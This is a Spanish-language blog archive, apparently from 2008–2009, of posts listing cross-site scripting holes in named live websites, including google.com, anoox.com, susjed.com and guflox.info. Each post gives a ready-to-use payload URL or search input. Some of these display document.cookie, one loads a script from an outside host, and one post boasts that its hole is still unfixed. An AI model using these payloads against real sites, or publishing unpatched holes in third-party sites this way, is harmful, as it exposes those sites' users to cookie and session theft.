Hola a todos, aqui les dejo esta vulnerabilidad descubierta por Black-Hacker en google.com. Nos vemos.
https://www.google.com/support/bin/answer.py?%22%3E%3C/script%3E%3Cscript%3Ealert(%22BlackHacker[dot
]Coder[at]Gmail[dot]com%22)%3C/script%3E=00000&hl=tr
Aun no ha sido corregida, nos vemos.
Mostrando las entradas con la etiqueta xss. Mostrar todas las entradas
Mostrando las entradas con la etiqueta xss. Mostrar todas las entradas
jueves, 25 de junio de 2009
Alerta en anoox.com
Navegando nuevamente por la red me encontre con el sitio anoox.com, el cual tiene un agujero de seguridad del tipo xss en la casilla de busqueda.
tan sólo escriban:
y veran el contenido de la cookie, ahi tienen la vulnerabilidad.
Nos vemos.
tan sólo escriban:
<script>alert(document.cookie);</script>
y veran el contenido de la cookie, ahi tienen la vulnerabilidad.
Nos vemos.
lunes, 29 de septiembre de 2008
Multiples errores en susjed.com
Una vez más, recorriendo la web... me encontré con este sitio, parece ser de origen ruso. Como que no le pagan bien al desarrollador web porque su sitio tiene más agujeros que un queso
gruyere.Muy bien:
El sistema de búsquedas del sitio no valida los campos de entrada y es objeto de ataques XSS.
Dentro del sitio hay instalados foros que pueden ser objeto del ataque. Nos vemos.
Urls:
http://dict.susjed.com/index.php?lang=en_hr&word=%3Cscript%3Ealert(%27alerta:%20%27+%2B+document.cookie)%3B%3C%2Fscript%3E
domingo, 21 de septiembre de 2008
Alerta Grave de XSS en guflox.info
Solo vean la imagen, no se valida correctamente la variable la búsqueda de datos. :
Variable afectada:
http://guflox.info/buscar.php?q=
Ejemplo:
http://guflox.info/buscar.php?q=%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E
Los administradores ya se dieron cuenta del error.
Variable afectada:
http://guflox.info/buscar.php?q=
Ejemplo:
http://guflox.info/buscar.php?q=%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E
Los administradores ya se dieron cuenta del error.
Suscribirse a:
Entradas (Atom)